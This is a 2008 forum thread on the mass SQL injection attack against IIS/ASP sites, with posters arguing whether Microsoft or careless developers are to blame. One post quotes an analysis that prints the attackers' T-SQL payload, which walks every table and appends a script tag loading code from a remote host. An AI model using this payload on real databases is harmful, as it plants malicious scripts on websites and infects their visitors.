 |
|
|
|
|
|
| |
| |
|
|
|
|
| |
| |
|
|
http://blog.wired.com/monkeybites/2008/04/microsoft-datab.html
John
--
I will be brief but not nearly so brief as Salvador Dali, who gave the
world's shortest speech. He said, "I will be so brief I am already
finished," then he sat down.
Post a reply to this message
|
|
| |
| |
|
|
|
|
| |
| |
|
|
"Doctor John" <doc### [at] gmail com> wrote in message
news:481623fb@news.povray.org...
> http://blog.wired.com/monkeybites/2008/04/microsoft-datab.html
>
From what I read, that's not the fault of any MS product, but of bad
developers not checking their DB input. SQL injection is just as possible on
a unix powered site with apache and oracle as iot is with IIS and SQL server
(or IIS with MySQL, or IIS with Oracle, or apache windows woth SQL server
...)
http://hackademix.net/2008/04/26/mass-attack-faq/
The attack is targeting Microsoft IIS web servers. Is it exploiting a
Microsoft vulnerability?
Yes and no. Web developers (or their employers who did not mandate proper
security education) are to blame for each single infection, because the SQL
injection exploited to infect the web sites is possible thanks to trivial
coding errors.
That said, the attackers are targeting IIS web servers which run ASP for a
reason.
Crackers put together a clever SQL procedure capable of polluting any
Microsoft SQL Server database in a generic way, with no need of knowing the
specific table and fields layouts:
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
''<script src=http://evilsite.com/1.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
This is the "secret sauce" which is allowing the attack to reach its
impressive numbers, and it works exclusively against Microsoft database
technology - but it's a feature, not a bug (no irony intended this time).
Anyway, the chances for such "powerful" DB technology of being used in
conjunction with web servers different than IIS are very low.
So, to recap:
1.. There's no Microsoft-specific vulnerability involved: SQL injections
can happpen (and do happen) on LAMP and other web application stacks as
well.
2.. SQL injections, and therefore these infections, are caused by poor
coding practices during web site development.
3.. Nonetheless, this mass automated epidemic is due to specific features
of Microsoft databases, allowing the exploit code to be generic, rather than
tailored for each single web site. Update: more details in this comment.
Post a reply to this message
|
|
| |
| |
|
|
|
|
| |
| |
|
|
Gail Shaw wrote:
> "Doctor John" <doc### [at] gmailcom> wrote in message
> news:481623fb@news.povray.org...
>> http://blog.wired.com/monkeybites/2008/04/microsoft-datab.html
>>
>
> From what I read, that's not the fault of any MS product, but of bad
> developers not checking their DB input. SQL injection is just as possible on
> a unix powered site with apache and oracle as iot is with IIS and SQL server
> (or IIS with MySQL, or IIS with Oracle, or apache windows woth SQL server
> ....)
>
I didn't say it was an M$ problem. I was just pointing at the numbers
involved.
As my subject line says: I promised not to mock :-)
(I may mock the developers tho ;) )
John
--
I will be brief but not nearly so brief as Salvador Dali, who gave the
world's shortest speech. He said, "I will be so brief I am already
finished," then he sat down.
Post a reply to this message
|
|
| |
| |
|
|
|
|
| |
| |
|
|
p.s.
The exploit also requires that the DB security is not using 'best practices'
(all data access through stored procedures, no rights to the base tables)
But if a developer/development team have left SQL injection vulnerabilities
in the front end, I somehow doubt they'll have got the DB security right.
Post a reply to this message
|
|
| |
| |
|
|
|
|
| |
| |
|
|
"Doctor John" <doc### [at] gmailcom> wrote in message
news:4816311a@news.povray.org...
>
> I didn't say it was an M$ problem. I was just pointing at the numbers
> involved.
Due to the prevelence of ASP sites and the likelyhood of ASP sites having a
SQL server backend. I wonder how many systems would be affected if the DB
code was changed to work on MySQL...
>
> (I may mock the developers tho ;) )
>
Please do. They should be taken out and shot. They give the rest of us a bad
name.
I wish people would learn something before they hack together (no pun
intended) a web site with database. It's so easy to get right, but so many
people get it so wrong, and this is the result.
Oh, for your amusement, here's a SQL injection with an Oracle backend. I
think it's using Java serverlets. Not 100% sure.
http://thedailywtf.com/Articles/Oklahoma-Leaks-Tens-of-Thousands-of-Social-S
ecurity-Numbers,-Other-Sensitive-Data.aspx
Post a reply to this message
|
|
| |
| |
|
|
|
|
| |
| |
|
|
Gail Shaw wrote:
>> (I may mock the developers tho ;) )
>
> Please do. They should be taken out and shot. They give the rest of us a bad
> name.
> I wish people would learn something before they hack together (no pun
> intended) a web site with database. It's so easy to get right, but so many
> people get it so wrong, and this is the result.
Arguably one might blame Microsoft for the whole "hey, computers are
easy now, you don't need to bother learning how to use them properly"
mentallity.
Once upon a time [and it was a LONG time ago], you had to have PhDs to
even understand how to switch on a computer... Obviously, that's a tad
too far in the other direction, but M$ does seem to spend a lot of time
yelling "hey, if you use VB everything will magically work without
effort". It makes people think they don't need to bother learning how to
do things properly.
So, not a technological flaw - more a mentallity issue, if you will...
--
http://blog.orphi.me.uk/
http://www.zazzle.com/MathematicalOrchid*
Post a reply to this message
|
|
| |
| |
|
|
|
|
| |
| |
|
|
> Arguably one might blame Microsoft for the whole "hey, computers are
> easy now, you don't need to bother learning how to use them properly"
> mentallity.
>
> Once upon a time [and it was a LONG time ago], you had to have PhDs to
> even understand how to switch on a computer... Obviously, that's a tad
> too far in the other direction, but M$ does seem to spend a lot of time
> yelling "hey, if you use VB everything will magically work without
> effort". It makes people think they don't need to bother learning how to
> do things properly.
PHP too. Few people use prepared statements in PHP, they just
concatenate strings into a SQL statement. And that's why PHP has such
abominations as "magic quotes", to protect the developers against
themselves, annoy to hell people who know what they're doing, and get
backslashes all over your webpages.
Post a reply to this message
|
|
| |
| |
|
|
|
|
| |
| |
|
|
Gail Shaw escribió:
> "Doctor John" <doc### [at] gmailcom> wrote in message
> news:481623fb@news.povray.org...
>> http://blog.wired.com/monkeybites/2008/04/microsoft-datab.html
>>
>
> From what I read, that's not the fault of any MS product, but of bad
> developers not checking their DB input. SQL injection is just as possible on
> a unix powered site with apache and oracle as iot is with IIS and SQL server
> (or IIS with MySQL, or IIS with Oracle, or apache windows woth SQL server
> ...)
Yep, it was plain old SQL injection.
http://www.computerworld.com/action/article.do?command=printArticleBasic&articleId=9080678
Post a reply to this message
|
|
| |
| |
|
|
|
|
| |
| |
|
|
"Orchid XP v8" <voi### [at] devnull> wrote in message
news:48163933$1@news.povray.org...
>
> Arguably one might blame Microsoft for the whole "hey, computers are
> easy now, you don't need to bother learning how to use them properly"
> mentallity.
Sorry, that's a cop-out. Blame someone else so you don't have to take
responsibility yourself.
SQL injection is mentioned in just about every single intro to web
development that I've seen. That include the '... for dummies' and '... in
24 hours' type books, as well as all the help files and documetation that
comes with the MS development tools. If there's a computer-literate person
out there who doesn't know that security is important, then they're been
under a rock for 10 years.
To make matters worse, find me another profession where people are willing
to take the cheaper option?
If you had to, say, go for eye surgery, and your options were a surgeon with
10 years experience who want to charge you a thousand pounds and an intern,
just out of med school who would do it for 200, which would you choose?
So, why in IT do people go for the cheapest option possible?
And if we're talking about computers are easy, no knowledge required,
shouldn't we also be blaming Apple?
Post a reply to this message
|
|
| |
| |
|
|
|
|
| |
| |
|
|
On Mon, 28 Apr 2008 21:53:34 +0100, Orchid XP v8 <voi### [at] devnull>
wrote:
>
>Once upon a time [and it was a LONG time ago], you had to have PhDs to
>even understand how to switch on a computer...
It was only the PhDs that thought that. The maintenance crew were
playing "Kingdom". ;)
--
Regards
Stephen
Post a reply to this message
|
|
| |
| |
|
|
|
|
| |
|
|
